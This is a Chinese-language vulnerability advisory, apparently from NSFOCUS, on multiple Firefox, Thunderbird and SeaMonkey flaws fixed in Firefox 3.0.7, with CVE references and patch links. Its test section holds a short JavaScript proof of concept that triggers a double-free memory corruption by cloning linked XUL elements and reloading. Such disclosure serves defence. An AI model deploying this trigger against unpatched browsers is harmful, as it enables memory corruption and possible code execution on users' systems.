安全研究

安全漏洞
Firefox 3.0.7更新修复多个漏洞

发布日期:2009-03-04
更新日期:2009-03-05

受影响系统:
Mozilla Firefox < 3.0.7
Mozilla Thunderbird < 2.0.0.21
Mozilla SeaMonkey < 1.1.15
不受影响系统:
Mozilla Firefox 3.0.7
Mozilla Thunderbird 2.0.0.21
Mozilla SeaMonkey 1.1.15
描述:
BUGTRAQ  ID: 33990
CVE(CAN) ID: CVE-2009-0771,CVE-2009-0772,CVE-2009-0773,CVE-2009-0774,CVE-2009-0775,CVE-2009-0777CVE-2009-0776

Firefox是Mozilla所发布的开源WEB浏览器。

Firefox中的多个安全漏洞允许恶意用户泄露敏感信息、绕过安全限制或入侵用户系统。由于代码共享,Thunderbird和SeaMonkey也受这些漏洞的影响。

1) 布局引擎和Javascript引擎中的错误可能导致内存破坏并执行任意代码。

2) 浏览器垃圾收集进程存在错误。在克隆多个DOM元素时,如果这些元素彼此链接,则重载浏览器就会触发内存破坏,导致双重释放。

3) 站点可以使用nsIRDFService和跨域重新定向破坏同源策略从其他域窃取任意XML数据。

4) 在地址栏中显示的时候可能会解码某些不可视的控制字符,导致显示的可视字符比实际的字符少。攻击者可以利用这个漏洞伪造地址栏,显示误导性的URL。

<*来源:Georgi Guninski (guninski@guninski.com
        Jesse Ruderman (jruderman@gmail.com
        Josh Soref
  
  链接:http://www.mozilla.org/security/announce/2009/mfsa2009-11.html
        http://www.mozilla.org/security/announce/2009/mfsa2009-09.html
        http://www.mozilla.org/security/announce/2009/mfsa2009-08.html
        http://www.mozilla.org/security/announce/2009/mfsa2009-07.html
        https://www.redhat.com/support/errata/RHSA-2009-0315.html
        https://www.redhat.com/support/errata/RHSA-2009-0325.html
        https://www.redhat.com/support/errata/RHSA-2009-0258.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

body = document.getElementById('mainbody');
noti = document.createElementNS(xulns,'notification');
body.appendChild(noti);
elem = document.createElement("div");
statusbar = document.createElementNS(xulns,'statusbarpanel');
clone = statusbar.cloneNode(1);
elem.appendChild(clone);
for(var x=0;x<10;x++) hs();
location.reload()

建议:
厂商补丁:

Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mozilla.org/

RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2009:0258-01)以及相应补丁:
RHSA-2009:0258-01:Moderate: thunderbird security update
链接:https://www.redhat.com/support/errata/RHSA-2009-0258.html

浏览次数:2526
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障